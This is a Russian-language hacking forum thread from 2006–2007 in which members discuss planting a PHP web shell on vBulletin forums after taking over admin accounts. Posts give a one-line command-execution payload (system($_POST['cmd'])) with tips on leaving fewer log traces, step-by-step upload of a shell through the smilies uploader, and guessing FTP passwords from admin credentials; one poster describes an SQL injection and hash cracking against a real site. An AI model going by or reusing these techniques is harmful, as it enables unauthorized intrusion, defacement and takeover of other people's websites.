Форумы Заливка шелла аттачем

Discussion in 'Уязвимости CMS/форумов' started by Spyder, 12 Dec 2006.

  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Вот возникла проблема. Взял админский акк на булке, захожу в админку, добавляю новый тип прикрепляемого файла - php (phtml тоже пробывал), MIME - ставлю application/octet-stream. Создаю новую тему, прикрепляю мой шелл, при переходе по ссылке выполняются только html теги, ПХП не хочет

    Кто нибудь знает можно ли что нибудь тут сделать?
     
    1 person likes this.
  2. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    Почемубы не сдлеать так? Зальещ шелл, а потом просто удалиш это.
     
  3. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    А лучше system($_POST["cmd"]);

    так меньше следов будет в ЛОгах тогда Получим запрос:

    www.xz.сom/forumpath/faq.php?
    POST: cmd=[command]
     
    2 people like this.
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    форум 3 0 1, там вообще ФАКа нет. Меня интересует возможность заливки шела аттачем
     
  5. vmn

    vmn Elder - Старейшина

    Joined:
    16 Oct 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Насколько я знаю, аттачи в булке хранятся в бд...
     
  6. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    Способ заливки шелла в vBulletin 2.*.* и 3.0.*
    1. Заходим в админку.
    2. Смайлы.
    3. Загрузить смайл.
    4. Грузим наш шелл. (папка по умолчанию /images/smilies)
    5. Заходим www.xz.сom/forumpath/images/smilies/shell.php

    Чем тебе не способ... с тебя + к репе
     
    1 person likes this.
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Sharky, еслиб ты ещё придумал этот способ то я поставил БЫ тебе +. Ты думаешь я не пробывал через смайлы заливать? =)
     
  8. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Та же история (есть админка надо шелл). Никакого способа не вижу кроме через аттач.

    Как обойти? В админке есть какие-то настройки. Что-то типа "Переместить аттачи на винт", но не пробовал пока что бы не привлекать внимание. Может кто знает.
     
  9. SHaDoW[RF]

    SHaDoW[RF] New Member

    Joined:
    23 Dec 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    Вам шелл нужен что бы дэфэйс поставить?
     
  10. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Не знаю для чего шелл нужен автору темы.

    А меня вопрос немного удивил. Что тут ответить: "Нет ну что Вы какой дефейс я из спортивного интереса ведь я белый и пушистый"
    или "Ну конечно для дефейса, а для чего же еще"
    Вот тут и вопрос, а чем мы тут все занимаемся?
    Ясен пень не дефейсить сайты учимся! А вот получить ответ на вопрос "можно ли залить шелл через аттач в указаном форуме" хотелось бы. А для чего, решать каждому в меру своей испорченности. У меня хобби найти ошибку и сказать админу сайта и параллельно узнать что-то новое. Я вот настолько ипорчен.
    Извините за длинный пост. Вопрос остаеться в силе. Можно залить или нет? Если да то как.
    И вопрос не означеет что я буду тупо сидеть и ждать когда мне все принесут на блюде, я тоже ищу ответы, в том числе и на форуме. Буду рад любой помощи очень мало инфы по vBulletin v3.6.2.
     
  11. SHaDoW[RF]

    SHaDoW[RF] New Member

    Joined:
    23 Dec 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    Нельзя!
     
  12. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Ого как быстро и уверено! А почему? В теории кажется все просто закинул файл, зашел по ссылке. В чем прикол, почему не катит такое?
     
  13. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Чел если бы было така маза то щас бы щас все и вся ресурсы имеллИ! . . .. // / / / Ты сам немного мозгами по рассикнЬЬЬ. / / /
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Если админ булки - хозяин сайта, то 50% что пасс от фтп такой же что и от админки :)

    Ps :d
     
  15. Принц

    Принц New Member

    Joined:
    18 Jul 2006
    Messages:
    14
    Likes Received:
    3
    Reputations:
    1
    n0ne
    35 % что тот же ))
     
  16. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Да я раскидываю уже долго (может маловато чем раскидывать). Я понимаю что если бы обычным пользователям было разрешено грузить любые файлы то и ломать нечего не надо... Но просто так аттачем нельзя загрузить php файл. И вот тут мне не понятно. Если я в админке добавлю новый тип аттачей (php), переключу хранение аттачей на диске, т.е. сделаю то что предлагает автор темы. Заливаем файл. Почему не выполниться php. Где эти настройки.
    Ну и если все-таки нельзя, то получается владение админкой форума на сайте не дает способа вторжения на сайт? Я не рассматриваю варианты забанить половину юзеров, и поудалять все сообщения, это не нафиг не нужно.
    З.Ы.
    В моем случае ситуация такая нашел sql-inj получил хеши и подобрал несколько. Один из паролей пренадлежит админу (не хозяину сайта, хеш хозяина не поддался). Вот вошел в админку, а дальше тупик.... уже долго.
     
    #16 Red_Red1, 20 Jan 2007
    Last edited: 20 Jan 2007